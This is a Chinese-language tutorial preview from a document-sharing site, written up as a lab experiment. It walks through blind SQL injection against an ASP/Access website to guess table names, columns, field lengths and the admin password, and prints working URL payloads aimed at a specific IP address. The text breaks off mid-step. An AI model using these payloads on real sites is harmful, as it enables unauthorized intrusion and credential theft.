sql注入入侵asp网站后台方法

sql注入入侵asp网站后台方法

ID:11417191

大小:470.50 KB

页数:7页

时间:2018-07-11

sql注入入侵asp网站后台方法_第1页
sql注入入侵asp网站后台方法_第2页
sql注入入侵asp网站后台方法_第3页
sql注入入侵asp网站后台方法_第4页
sql注入入侵asp网站后台方法_第5页
资源描述:

《sql注入入侵asp网站后台方法》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、今天心情不错,曾经很想成为一名Hacker,学习服务器很久,今天收获颇丰,掌握SQL攻击access数据库的五条语句,绕过系统验证,侵入系统后台数据库,获得后台密码,侵入成功!!!时间2012年10月10号夜晚,地点实验室,hacker黄,现在我就把过程慢慢叙述下来,供大家学习。实验平台,windowxp,环境,asp加上access数据库,目标,侵入网站数据库,得到后台密码。得到密码就算成功率。此为目标,接下来为了大家看的更清晰就分为几步介绍本次实验。第一部分简单介绍先说些别的,本文的攻击方法成为SQL注入,由于本人初次学习,所以本实验的攻击方法为手动输入SQL攻击asp网站。获得网站的

2、登录权限。攻击网站首页如下第二部分搜寻网站SQL注入点 尝试几个有传入参数的页面,逐个测试是否有SQL注入漏洞,识别方法为:把网址栏的ID=***x加个号,或在表单输入号,如果提示表达式错误,表示有漏洞可注入,另外,通过这个方式可以得到程序所用的数据库类型。点击北京链接会发现地址栏中出现了变量,直接在后面加入“’”返回错误,初步判断有注入漏洞。  进行验证是否存在SQL注入漏洞,验证方法如下:在这里我们可以看到几条信息,第一错误信息上位JET database基本可以肯定为access数据库。第二出现字符串语法错误有可能存在注入漏洞。第三我们提交的字符串被单引号包含着说明是字符型。接下来利

3、用字符型判断语句“' and '1'='1”和“'and '1'='2”测试。会发现“' and '1'='1”返回正确而“' and '1'='2”返回错误肯定存在注入漏洞。第三部验证漏洞后通过SQL入侵得到用户名和密码此处我们破解的流程如下:判断数据库表名—> 判断数据库列名—>判断列名字段个数—>字段猜解下面沾出实验的五个语句,然后慢慢带着大家破解测试数据库中字段长度http://202.114.145.8/index.asp?city=bj'and(selecttop1len(tel)frominfo)>10and'1'='1猜测数据库中表' and exists (select 

4、* from admin) and '1'='1猜测数据库中字段子列' and exists (select admin from info) and '1'='1利用二分法猜测数据库中的信息条数' and (select Count(1) from [info] where 1=1) between 0 and 100 and '1'='1猜测数据库中值得代码http://202.114.145.8/index.asp?city=bj'and(selecttop1asc(mid(city,1,1))frominfo)>97and'1'='1第四部分开始破解1破解表名在地址栏后加上' an

5、d exists (select * from 表名) and '1'='1当常用表名输入info时系统返回正常图面如下我们再随意输入一个表名“' and exists (select * from admin) and '1'='1”发现返回错误并且错误写着找不到输入表admin,这就说明不存在admin表但是存在info表。2.破解列名首先经过对表名的破解大家已经有了基础,还是破解列名的方法也是一样的如下猜测列名语句猜测数据库中字段子列' and exists (select 列名 from info) and '1'='1将列名换成username反馈正常判断有username接下来

6、我们将列名换成admin发现反馈错从而判断有username按照同样的方法我们现在可以猜出有列名password总结下,现在我们已经破解出来了表,info,列名username,列名password3.破解列名的长度username破解语句如下测试数据库中字段长度http://202.114.145.8/index.asp?city=bj'and(selecttop1len(字段名)frominfo)>数字Nand'1'='1如上我们将字段名换成username数字N换成1.2.3.4.直到显示错误判断字段的长度如下图当N=4时反馈正常,当N=5时反馈不正常,从而判断n=5所以userna

7、me字段长度为5N=4反馈正常如下N=5反馈不正常总结下,现在我们已经破解出来了表,info,列名username,列名password列名username长度5列名password长度24.破解username的内容猜测数据库中值得代码http://202.114.145.8/index.asp?city=bj'and(selecttop1asc(mid(列名,N,1))frominfo)>mand'1'='1如上述语

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。